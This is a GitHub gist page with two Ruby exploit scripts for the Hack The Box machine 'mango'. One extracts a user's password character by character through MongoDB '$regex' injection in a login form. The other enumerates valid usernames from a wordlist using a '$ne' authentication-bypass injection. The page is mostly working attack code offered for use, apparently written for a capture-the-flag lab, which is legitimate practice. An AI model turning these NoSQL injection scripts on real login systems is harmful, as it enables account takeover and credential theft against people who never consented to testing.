Skip to content

Instantly share code, notes, and snippets.

@LevitatingBusinessMan

LevitatingBusinessMan/getpass.rb

Last active August 21, 2020 23:57
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save LevitatingBusinessMan/92f09ebc83f8ffb3c0c278f451c44188 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save LevitatingBusinessMan/92f09ebc83f8ffb3c0c278f451c44188 to your computer and use it in GitHub Desktop.
Download ZIP
NoSQL exploits for HTB
Raw
getpass.rb
#!/usr/bin/ruby
require 'net/http'
require 'uri'
require 'fileutils'
user = ARGV[0] || "mango"
puts "Attacking #{user}"
#chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789".split ""
#i = 0
i = 32
known = ""
while true
uri = URI "http://staging-order.mango.htb/"
#query = known + chars[i]
query = "#{known}[#{i.chr}]"
params = {
"username"=> user,
"password[$regex]"=> "^#{query}"
}
res = Net::HTTP.post_form(uri, params)
if res.code == "302"
i = 0
print "\r#{query.gsub(/\[(.)\]/, '\1')}"
known = query
end
puts "\n#{res.code} with #{query}"if res.code != "302" && res.code != "200"
i += 1
#if i >= chars.length
if i >= 128
puts " no further char found"
exit
end
end
Raw
userenum.rb
require 'net/http'
require 'uri'
require 'fileutils'
return puts "Yo we need a wordlist bro" if ARGV.length < 1
wordlist = (File.read ARGV[0]).force_encoding("iso-8859-1").split "\n"
puts "#{wordlist.length} words"
i = 0
for word in wordlist
uri = URI "http://staging-order.mango.htb/"
params = {
"username"=> word,
"password[$ne]"=> "foo"
}
res = Net::HTTP.post_form(uri, params)
puts "Found username #{word}" if res.code == "302"
puts "#{word} resulted in #{res.code}" if res.code != "200" && res.code != "302"
i += 1
print("\r#{i}/#{wordlist.length}")
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment